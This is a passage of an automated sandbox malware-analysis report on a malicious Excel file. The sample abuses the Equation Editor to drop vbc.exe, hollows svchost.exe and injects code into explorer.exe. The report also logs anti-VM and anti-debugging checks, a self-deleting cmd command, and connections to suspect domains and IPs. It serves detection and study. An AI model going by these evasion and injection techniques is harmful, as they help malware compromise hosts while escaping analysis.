Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_009EFDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_009EFED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFFB4 NtCreateSection,LdrInitializeThunk, 9_2_009EFFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F10D0 NtOpenProcessToken, 9_2_009F10D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0048 NtProtectVirtualMemory, 9_2_009F0048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0078 NtResumeThread, 9_2_009F0078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0060 NtQuerySection, 9_2_009F0060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F01D4 NtSetValueKey, 9_2_009F01D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F010C NtOpenDirectoryObject, 9_2_009F010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F1148 NtOpenThread, 9_2_009F1148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF8CC NtWaitForSingleObject, 9_2_009EF8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF938 NtWriteFile, 9_2_009EF938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F1930 NtSetContextThread, 9_2_009F1930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFA20 NtQueryInformationFile, 9_2_009EFA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFA50 NtEnumerateValueKey, 9_2_009EFA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFBE8 NtQueryVirtualMemory, 9_2_009EFBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC90 NtUnmapViewOfSection, 9_2_009EFC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC30 NtOpenProcess, 9_2_009EFC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC48 NtSetInformationFile, 9_2_009EFC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0C40 NtGetContextThread, 9_2_009F0C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F1D80 NtSuspendThread, 9_2_009F1D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFD5C NtEnumerateKey, 9_2_009EFD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFEA0 NtReadVirtualMemory, 9_2_009EFEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFE24 NtWriteVirtualMemory, 9_2_009EFE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFFFC NtCreateProcessEx, 9_2_009EFFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFF34 NtQueueApcThread, 9_2_009EFF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000981C0 NtCreateFile, 9_2_000981C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098270 NtReadFile, 9_2_00098270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000982F0 NtClose, 9_2_000982F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000983A0 NtAllocateVirtualMemory, 9_2_000983A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009826D NtReadFile, 9_2_0009826D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009839A NtAllocateVirtualMemory, 9_2_0009839A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0084632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_0084632E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 9_2_008467C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00846332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_00846332
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008467C2 NtQueryInformationProcess, 9_2_008467C2
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: vbc[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: COAU7229898130.xlsx Virustotal: Detection: 35%
Source: COAU7229898130.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$COAU7229898130.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE954.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/27@6/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: vbc[1].exe.4.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: vbc.exe.4.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514322943.0000000000549000.00000004.00000020.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.4.dr, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00F7297F push 20000001h; retf 6_2_00F72992
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A024 push es; ret 6_2_0045A025
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418846 push edi; retf 7_2_00418847
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C935 push ds; ret 7_2_0041C93E
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C99B push dword ptr [87B7EB05h]; ret 7_2_0041C9BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415298 push ebp; retf 7_2_00415299
Source: C:\Users\Public\vbc.exe Code function: 7_2_0040C300 push ds; iretd 7_2_0040C318
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CB3F pushad ; ret 7_2_0041CB40
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3B5 push eax; ret 7_2_0041B408
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B46C push eax; ret 7_2_0041B472
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B402 push eax; ret 7_2_0041B408
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B40B push eax; ret 7_2_0041B472
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C538 push dword ptr [2E33947Ah]; ret 7_2_0041C791
Source: C:\Users\Public\vbc.exe Code function: 7_2_00414D98 push ebx; retf 7_2_00414DA7
Source: C:\Users\Public\vbc.exe Code function: 7_2_004066FC push ecx; iretd 7_2_00406713
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C793 push dword ptr [2E33947Ah]; ret 7_2_0041C791
Source: C:\Users\Public\vbc.exe Code function: 7_2_00F7297F push 20000001h; retf 7_2_00F72992
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092DFA1 push ecx; ret 7_2_0092DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FDFA1 push ecx; ret 9_2_009FDFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00095298 push ebp; retf 9_2_00095299
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0008C300 push ds; iretd 9_2_0008C318
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B3B5 push eax; ret 9_2_0009B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B40B push eax; ret 9_2_0009B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B402 push eax; ret 9_2_0009B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B46C push eax; ret 9_2_0009B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C538 push dword ptr [2E33947Ah]; ret 9_2_0009C791
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000866FC push ecx; iretd 9_2_00086713
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C793 push dword ptr [2E33947Ah]; ret 9_2_0009C791
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098846 push edi; retf 9_2_00098847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C935 push ds; ret 9_2_0009C93E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C99B push dword ptr [87B7EB05h]; ret 9_2_0009C9BC
Source: initial sample Static PE information: section name: .text entropy: 7.5240697297
Source: initial sample Static PE information: section name: .text entropy: 7.5240697297

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 940, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2432 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2248 Thread sleep time: -33461s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2732 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2680 Thread sleep time: -36000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 33461 Jump to behavior
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.500434774.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.500434774.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.485172151.000000000449C000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0v
Source: explorer.exe, 00000008.00000000.485467727.0000000004513000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Co>
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000008.00000000.487676458.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000008.00000000.500756480.00000000045D4000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h] 7_2_009326F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A026F8 mov eax, dword ptr fs:[00000030h] 9_2_00A026F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B20 LdrLoadDll, 7_2_00409B20
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thvsjwjvy.icu
Source: C:\Windows\explorer.exe Domain query: www.carlsbadbeachwear.com
Source: C:\Windows\explorer.exe Domain query: www.biotechfla.com
Source: C:\Windows\explorer.exe Network Connect: 154.91.1.126 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 47.91.170.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.359326.com
Source: C:\Windows\explorer.exe Domain query: www.absolutalibertas.com
Source: C:\Windows\explorer.exe Domain query: www.crownfoamus.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 830000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
